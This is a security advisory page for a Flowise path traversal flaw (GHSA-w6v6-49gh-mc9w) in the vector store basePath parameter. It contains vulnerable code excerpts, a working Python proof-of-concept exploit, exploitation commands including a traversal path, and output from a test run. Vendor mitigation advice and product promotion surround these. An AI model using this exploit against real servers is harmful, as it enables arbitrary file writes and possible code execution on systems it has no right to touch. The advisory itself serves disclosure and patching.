Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-w6v6-49gh-mc9w

Flowise: Path Traversal in Vector Store basePath

Published
Apr 16, 2026
Updated
Apr 16, 2026
Affected
2 pkgs
Patched
2 / 2
Exploits
None indexed

Blast Radius

2 pkgs affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

flowisenpm
2Kdownloads / week
flowise-componentsnpm
2Kdownloads / week

Description

Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a basePath parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

Vulnerability Details

FieldValue
Affected Filepackages/components/nodes/vectorstores/Faiss/Faiss.ts (lines 79, 91)
Affected Filepackages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts (lines 83-104)

Prerequisites

  1. Authentication: Valid API token with documentStores:upsert-config permission
  2. Document Store: An existing Document Store with at least one processed chunk
  3. Embedding Credentials: Valid embedding provider credentials (e.g., OpenAI API key)

Root Cause

Faiss (Faiss.ts)

async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    // ...
    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
    await vectorStore.save(basePath)  // Direct filesystem write, no validation
}

SimpleStore (SimpleStore.ts)

async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    
    let filePath = ''
    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
    else filePath = basePath  // Used directly without sanitization
    
    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path
}

Impact

An authenticated attacker can:

  1. Write files to arbitrary locations on the server filesystem
  2. Overwrite existing files if the process has write permissions
  3. Potential for code execution by writing to web-accessible directories or startup scripts
  4. Data exfiltration by writing to network-mounted filesystems

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
  python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""

import argparse
import json
import urllib.request
import urllib.error

def post_json(url, data, headers):
    req = urllib.request.Request(
        url,
        data=json.dumps(data).encode("utf-8"),
        headers={**headers, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=120) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True)
    ap.add_argument("--token", required=True)
    ap.add_argument("--store-id", required=True)
    ap.add_argument("--credential", required=True)
    ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
    args = ap.parse_args()

    payload = {
        "storeId": args.store_id,
        "vectorStoreName": "faiss",
        "vectorStoreConfig": {"basePath": args.base_path},
        "embeddingName": "openAIEmbeddings",
        "embeddingConfig": {"credential": args.credential},
    }

    url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
    headers = {"Authorization": f"Bearer {args.token}"}

    try:
        status, body = post_json(url, payload, headers)
        print(body)
    except urllib.error.HTTPError as e:
        print(e.read().decode())

if __name__ == "__main__":
    main()

Setup

  1. Create a Document Store in Flowise UI
  2. Add a Document Loader (e.g., Plain Text) with any content
  3. Click "Process" to create chunks
  4. Note the Store ID from the URL
  5. Get your embedding credential ID from Settings → Credentials

Exploitation

# Write to /tmp
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path "../../../../tmp/traversal-test"

Evidence

$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned

{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .
drwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..
-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json
-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index

Affected Packages

2 total 2 fixed
EcosystemPackageVulnerable rangeFix
📦npmflowiseall versions3.1.0
📦npmflowise-componentsall versions3.1.0

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for flowise. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update flowise to 3.1.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-w6v6-49gh-mc9w is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-w6v6-49gh-mc9w is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-w6v6-49gh-mc9w. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem. ## Vulnerability Details | Field | Value | |-------|-------| | Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) | | Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) | ## Prere
O3 Security · Impact-Aware SCA

Is GHSA-w6v6-49gh-mc9w in your dependencies?

O3 detects GHSA-w6v6-49gh-mc9w across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works